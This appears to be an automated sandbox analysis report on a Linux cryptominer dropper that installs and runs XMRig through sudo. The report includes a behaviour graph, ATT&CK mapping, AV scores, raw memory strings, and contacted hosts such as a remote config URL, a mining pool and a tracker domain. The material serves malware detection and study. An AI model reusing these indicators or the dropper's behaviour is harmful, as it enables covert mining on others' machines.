            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/package_cpusJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/physical_package_idJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/shared_cpu_mapJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/levelJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/typeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/idJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/sizeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/coherency_line_sizeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/number_of_setsJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/physical_line_partitionJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/shared_cpu_mapJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/levelJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/typeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/idJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/shared_cpu_mapJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/levelJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/typeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/idJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/sizeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/coherency_line_sizeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/number_of_setsJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/physical_line_partitionJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/shared_cpu_mapJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/levelJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/typeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/idJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/sizeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/coherency_line_sizeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/number_of_setsJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/physical_line_partitionJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/possibleJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)Queries kernel information via 'uname': Jump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Queries kernel information via 'uname': Jump to behavior
            Source: /sbin/modprobe (PID: 5476)Queries kernel information via 'uname': Jump to behavior
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpBinary or memory string: 727 (vmtoolsd) S 1 727 727 0 -1 4194560 576 4629 20 1 7 10 10 1 0 -20 2 0 664 89436160 1783 18446744073709551615 94509448179712 94509448223045 140735497096048 0 0 0 0 6144 16903 0 0 0 17 1 0 0 2 0 0 94509448243152 94509448245376 94509479976960 140735497097009 140735497097027 140735497097027 140735497097190 0
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpBinary or memory string: _5+"e3047655d4268d619b50ec05c73a751f5ef3dbb04e486caab12fc585ee5c67bb"2vmw_vmci 69632 2 vmw_vsock_vmci_transport,vmw_balloon, Live 0xffffffffc07e7000
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpBinary or memory string: vmtoolsdy
            Source: xmr_linux_amd64.elfBinary or memory string: bindunix.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2/sysrolevboxselfEDOMEADVcap -> failbitsTypeasn1cx16sse2xmrigcbashbash2amd64unamegnamemtimeatimectimeUSTARfalse<nil>Error&amp;&#34;&#39;https:***@Rangerangeclose:path%s %q%s=%sHTTP/socksFoundchdirwritemkdir$HOMEchmodlinuxgetwdpipe2lstatdefersweeptestRtestWexecWexecRschedhchansudoggscanmheaptracepanicsleepgcingfault[...]MarchAprilmonthLocalarray1562578125AppleIntelPOWERint16int32int64uint8slice$USERtls: Earlyparsefilesimap2imap3imapspop3shosts.avif.html.jpeg.json.wasm.webputf-8%s*%dtext/Realmbad nAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3/procbtimeguestVxID:CLOSEEPERMESRCHEINTRENXIOE2BIGEBADFEBUSYEXDEVEFBIGEROFSEPIPEELOOPEIDRMEBADEEBADRETIMEENOSRECOMMSIGIOmatchrune SHA-1P-224P-256P-384P-521ECDSA (at TypeAClassxmrig1helperpc784foracle/xmrigStringFormat[]bytestringClosedCANCELGOAWAYPADDEDactiveclosedsocks5Basic CookieacceptallowcookieexpectoriginserverExpectstatusPragmasocks Lockedremovewaitidexec: sysmontimersefenceselect, not GOROOTobjectSundayMondayFridayAugustminutesecond390625CaviumNVIDIAAmperePOWER8POWER7uint16uint32uint64structchan<-<-chan Valuehangupkilled/proc/errno , val X25519%w%.0wtls13 AcceptServernetdnsdomaingophertelnetlisten.onionndots:ip+netsocketArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphensplicerdtscppopcntcmd/gouptimesystemvmwareopenvzcgroupdockerLISTENENOENTECHILDEAGAINENOMEMEACCESEFAULTEEXISTENODEVEISDIREINVALENFILEEMFILEENOTTYENOSPCESPIPEEMLINKERANGEENOLCKENOSYSENOMSGECHRNGEL3HLTEL3RSTELNRNGENOCSIEL2HLTEXFULLENOANOEBFONTENOSTRENONETENOPKGESRMNTEPROTOEBADFDEILSEQEUSERSESTALEEISNAMEDQUOTENOKEYSIGHUPSIGINTSIGILLSIGBUSSIGFPESIGURGSIGPWRSIGSYSempty rune1 TypeNSTypeMXheaderAnswerLengthonlineSTREETavx512rdrandrdseedunaliasfloat32float64UpgradeHEADERSTrailerReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUG:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECT (trap forcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningUNKNOWN:eventsTuesdayJanuaryOctoberenvironcmdline19531259765625cpuinfoFujitsuMarvellinvaliduintptrSwapperChanDir Value>Convertabortedstoppedsignal nil keyderivedInitialExpiresSubjectconnectlookup writetocharsetAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalavx512fos/execruntimemodulesvboxdrvCLOSINGENOEXECENOTBLKENOTDIRETXTBSYEDEADLKEUNATCHEBADRQCEBADSLTENODATAEREMOTEENOLINKEDOTDOTEBADMSGEREMCHGELIBACCELIBBADELIBSCNELIBMAXENOTSUPENOBUFSEISCONNEUCLEANENOTNAMENAVAILERFKILLSIGQUITSIGTRAPSIGABRTSIGKILLSIGUSR1SIGSEGVSIGUSR2SIGPIPESIGALRMSIGTERMSIGCHLDSIGCONTSIGSTOPSIGTSTPSIGTTINSIGTTOUSIGXCPUSIGXFSZSIGPROFInstAltInstNopalt -> nop -> any -> SHA-224SHA-256SHA-384SHA-512DES-CBCEd25519MD2-RSAMD5-RSAse
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpBinary or memory string: /proc/727/stat/proc/727/statdragonfl727 dragonflydragonflyvmtoolsdyHOST_PROC/proc/stat/proc/statdragonfl/procdragonflydragonflyctxt 1074714
            Source: xmr_linux_amd64.elfBinary or memory string: cookieexpectoriginserverExpectstatusPragmasocks Lockedremovewaitidexec: sysmontimersefenceselect, not GOROOTobjectSundayMondayFridayAugustminutesecond390625CaviumNVIDIAAmperePOWER8POWER7uint16uint32uint64structchan<-<-chan Valuehangupkilled/proc/errno , val X25519%w%.0wtls13 AcceptServernetdnsdomaingophertelnetlisten.onionndots:ip+netsocketArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphensplicerdtscppopcntcmd/gouptimesystemvmwareopenvzcgroupdockerLISTENENOENTECHILDEAGAINENOMEMEACCESEFAULTEEXISTENODEVEISDIREINVALENFILEEMFILEENOTTYENOSPCESPIPEEMLINKERANGEENOLCKENOSYSENOMSGECHRNGEL3HLTEL3RSTELNRNGENOCSIEL2HLTEXFULLENOANOEBFONTENOSTRENONETENOPKGESRMNTEPROTOEBADFDEILSEQEUSERSESTALEEISNAMEDQUOTENOKEYSIGHUPSIGINTSIGILLSIGBUSSIGFPESIGURGSIGPWRSIGSYSempty rune1 TypeNSTypeMXheaderAnswerLengthonlineSTREETavx512rdrandrdseedunaliasfloat32float64UpgradeHEADERSTrailerReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUG:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECT (trap forcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningUNKNOWN:eventsTuesdayJanuaryOctoberenvironcmdline19531259765625cpuinfoFujitsuMarvellinvaliduintptrSwapperChanDir Value>Convertabortedstoppedsignal nil keyderivedInitialExpiresSubjectconnectlookup writetocharsetAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalavx512fos/execruntimemodulesvboxdrvCLOSINGENOEXECENOTBLKENOTDIRETXTBSYEDEADLKEUNATCHEBADRQCEBADSLTENODATAEREMOTEENOLINKEDOTDOTEBADMSGEREMCHGELIBACCELIBBADELIBSCNELIBMAXENOTSUPENOBUFSEISCONNEUCLEANENOTNAMENAVAILERFKILLSIGQUITSIGTRAPSIGABRTSIGKILLSIGUSR1SIGSEGVSIGUSR2SIGPIPESIGALRMSIGTERMSIGCHLDSIGCONTSIGSTOPSIGTSTPSIGTTINSIGTTOUSIGXCPUSIGXFSZSIGPROFInstAltInstNopalt -> nop -> any -> SHA-224SHA-256SHA-384SHA-512DES-CBCEd25519MD2-RSAMD5-RSAserial:::ffff:TypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLanswers2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5amxtileamxint8amxbf16osxsave#interni
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpBinary or memory string: vmw_vmci 69632 2 vmw_vsock_vmci_transport,vmw_balloon, Live 0xffffffffc07e7000

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting            		Valid AccountsWindows Management Instrumentation1
            Scripting            		1
            Kernel Modules and Extensions            		1
            Hide Artifacts            		1
            OS Credential Dumping            		11
            Security Software Discovery            		Remote ServicesData from Local System1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            Kernel Modules and Extensions            		1
            Sudo and Sudo Caching            		1
            File and Directory Permissions Modification            		LSASS Memory1
            System Network Configuration Discovery            		Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            Hidden Files and Directories            		Security Account Manager11
            File and Directory Discovery            		SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Sudo and Sudo Caching            		NTDS23
            System Information Discovery            		Distributed Component Object ModelInput Capture3
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging1
            Proxy            		Scheduled TransferData Encrypted for Impact

            Malware Configuration

            No configs have been found

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Number of created Files
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1512955 Sample: xmr_linux_amd64.elf Startdate: 18/09/2024 Architecture: LINUX Score: 100 31 vmtracker.freechildporninthisserver.lol 2->31 33 pool.supportxmr.com 2->33 35 6 other IPs or domains 2->35 41 Malicious sample detected (through community Yara rule) 2->41 43 Antivirus detection for dropped file 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 6 other signatures 2->47 10 xmr_linux_amd64.elf 2->10         started        signatures3 process4 file5 27 /tmp/xmrig/xmrig-6.21.3/xmrig, ELF 10->27 dropped 29 /tmp/xmrig/xmrig-6.21.3/config.json, JSON 10->29 dropped 13 xmr_linux_amd64.elf sudo 10->13         started        15 xmr_linux_amd64.elf sudo 10->15         started        process6 process7 17 sudo xmrig 13->17         started        20 sudo true 15->20         started        signatures8 37 Writes to CPU model specific registers (MSR) (e.g. miners improve performance by disabling HW prefetcher) 17->37 39 Sample reads /proc/mounts (often used for finding a writable filesystem) 17->39 22 xmrig sh 17->22         started        process9 process10 24 sh modprobe 22->24         started        signatures11 49 Tries to load the MSR kernel module used for reading/writing to CPUs model specific register 24->49

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            xmr_linux_amd64.elf29%ReversingLabsWin32.Coinminer.XMRig
            xmr_linux_amd64.elf35%VirustotalBrowse
            xmr_linux_amd64.elf100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            /tmp/xmrig/xmrig-6.21.3/xmrig100%AviraANDROID/AVE.Miner.nezaa
            /tmp/xmrig/xmrig-6.21.3/xmrig100%Joe Sandbox ML
            /tmp/xmrig/xmrig-6.21.3/xmrig71%ReversingLabsLinux.Trojan.Miner

            Domains

            SourceDetectionScannerLabelLink
            pool-fr.supportxmr.com3%VirustotalBrowse
            daisy.ubuntu.com0%VirustotalBrowse
            github.com0%VirustotalBrowse
            raw.githubusercontent.com0%VirustotalBrowse
            api.ipify.org0%VirustotalBrowse
            pool.supportxmr.com8%VirustotalBrowse
            objects.githubusercontent.com1%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.accv.es/legislacion_c.htm0U0%Avira URL Cloudsafe
            http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl00%Avira URL Cloudsafe
            https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/d0ce794d-b593-0%Avira URL Cloudsafe
            https://api.ipify.org?format=text0%Avira URL Cloudsafe
            http://ocsp.accv.es060102150405Z0700060102150405Z0700rking060102150405Z0700um060102150405Z0700Affirm0%Avira URL Cloudsafe
            https://github.com0%Avira URL Cloudsafe
            http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0D10%Avira URL Cloudsafe
            https://wwww.certigna.fr/autorites/0m0%Avira URL Cloudsafe
            http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0D10%VirustotalBrowse
            http://ocsp.accv.es00%Avira URL Cloudsafe
            http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl00%VirustotalBrowse
            https://xmrig.com/wizard%s0%Avira URL Cloudsafe
            http://crl.dhimyotis.com/certignarootca.crl00%Avira URL Cloudsafe
            https://wwww.certigna.fr/autorites/0m0%VirustotalBrowse
            https://github.com0%VirustotalBrowse
            http://crl.dhimyotis.com/certignarootca.crl00%VirustotalBrowse
            https://vmtracker.freechildporninthisserver.lol/postgresqlstore0%Avira URL Cloudsafe
            http://www.accv.es/legislacion_c.htm0U0%VirustotalBrowse
            http://repository.swisssign.com/00%VirustotalBrowse
            https://api.ipify.org?format=text1%VirustotalBrowse
            http://repository.swisssign.com/00%Avira URL Cloudsafe
            http://www.firmaprofesional.com/cps00%Avira URL Cloudsafe
            https://xmrig.com/wizard0%Avira URL Cloudsafe
            https://raw.githubusercontent.com/spetterman66/verynicerepo/main/config.json/tmp/xmrig0%Avira URL Cloudsafe
            http://crl.securetrust.com/SGCA.crl00%Avira URL Cloudsafe
            https://raw.githubusercontent.com/spetterman66/verynicerepo/main/config.json0%Avira URL Cloudsafe
            http://crl.securetrust.com/STCA.crl00%Avira URL Cloudsafe
            https://github.commissing0%Avira URL Cloudsafe
            https://xmrig.com/wizard2%VirustotalBrowse
            http://www.firmaprofesional.com/cps00%VirustotalBrowse
            https://gcc.gnu.org/bugsrg/bugs/):0%Avira URL Cloudsafe
            https://www.catcert.net/verarrel0%Avira URL Cloudsafe
            https://api.ipify.org?format=textcpu0%Avira URL Cloudsafe
            http://crl.securetrust.com/STCA.crl00%VirustotalBrowse
            https://xmrig.com/wizard%s2%VirustotalBrowse
            https://api.ipify.org/?format=text0%Avira URL Cloudsafe
            http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt00%Avira URL Cloudsafe
            http://www.quovadisglobal.com/cps00%Avira URL Cloudsafe
            http://crl.securetrust.com/SGCA.crl00%VirustotalBrowse
            https://www.catcert.net/verarrel0%VirustotalBrowse
            http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0%Avira URL Cloudsafe
            http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt00%VirustotalBrowse
            http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl00%Avira URL Cloudsafe
            https://www.ubuntu.com/legal/terms-and-policies/privacy-policy0%Avira URL Cloudsafe
            http://crl.xrampsecurity.com/XGCA.crl00%Avira URL Cloudsafe
            http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0%VirustotalBrowse
            https://www.catcert.net/verarrel050%Avira URL Cloudsafe
            http://www.quovadisglobal.com/cps00%VirustotalBrowse
            https://api.ipify.org/?format=text1%VirustotalBrowse
            http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl00%VirustotalBrowse
            https://xmrig.com/docs/algorithms0%Avira URL Cloudsafe
            http://crl.certigna.fr/certignarootca.crl010%Avira URL Cloudsafe
            https://gcc.gnu.org/bugsrg/bugs/):1%VirustotalBrowse
            http://www.quovadis.bm00%Avira URL Cloudsafe
            http://crl.xrampsecurity.com/XGCA.crl00%VirustotalBrowse
            https://xmrig.com/benchmark/%s0%Avira URL Cloudsafe
            https://www.ubuntu.com/legal/terms-and-policies/privacy-policy0%VirustotalBrowse
            http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0%Avira URL Cloudsafe
            http://ocsp.accv.es0%Avira URL Cloudsafe
            http://www.accv.es000%Avira URL Cloudsafe
            https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
            https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz0%Avira URL Cloudsafe
            https://xmrig.com/docs/algorithms2%VirustotalBrowse
            http://policy.camerfirma.com00%Avira URL Cloudsafe
            http://www.cert.fnmt.es/dpcs/00%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            pool-fr.supportxmr.com
            		141.94.96.195
            		truefalseunknown
            daisy.ubuntu.com
            		162.213.35.24
            		truefalseunknown
            github.com
            		140.82.121.4
            		truefalseunknown
            raw.githubusercontent.com
            		185.199.108.133
            		truefalseunknown
            api.ipify.org
            		104.26.13.205
            		truefalseunknown
            objects.githubusercontent.com
            		185.199.108.133
            		truefalseunknown
            pool.supportxmr.com
            		unknown
            		unknowntrueunknown
            vmtracker.freechildporninthisserver.lol
            		unknown
            		unknowntrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://raw.githubusercontent.com/spetterman66/verynicerepo/main/config.jsonfalse
              • Avira URL Cloud: safe
              		unknown
              https://api.ipify.org/?format=textfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gzfalse
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://api.ipify.org?format=textxmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/d0ce794d-b593-xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://ocsp.accv.es060102150405Z0700060102150405Z0700rking060102150405Z0700um060102150405Z0700Affirmxmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.accv.es/legislacion_c.htm0Uxmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://github.comxmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0D1xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://wwww.certigna.fr/autorites/0mxmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://ocsp.accv.es0xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://xmrig.com/wizard%sxmrig.12.drfalse
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://crl.dhimyotis.com/certignarootca.crl0xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://vmtracker.freechildporninthisserver.lol/postgresqlstorexmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.firmaprofesional.com/cps0xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://repository.swisssign.com/0xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://xmrig.com/wizardxmrig.12.drfalse
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://raw.githubusercontent.com/spetterman66/verynicerepo/main/config.json/tmp/xmrigxmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://crl.securetrust.com/SGCA.crl0xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://crl.securetrust.com/STCA.crl0xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://github.commissingxmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://gcc.gnu.org/bugsrg/bugs/):xmrig.12.drfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://www.catcert.net/verarrelxmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://api.ipify.org?format=textcpuxmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.quovadisglobal.com/cps0xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crlxmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://www.ubuntu.com/legal/terms-and-policies/privacy-policyxmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://crl.xrampsecurity.com/XGCA.crl0xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://www.catcert.net/verarrel05xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://xmrig.com/docs/algorithmsxmrig.12.drfalse
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://crl.certigna.fr/certignarootca.crl01xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.quovadis.bm0xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://xmrig.com/benchmark/%sxmrig.12.drfalse
              • Avira URL Cloud: safe
              		unknown
              http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crlxmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
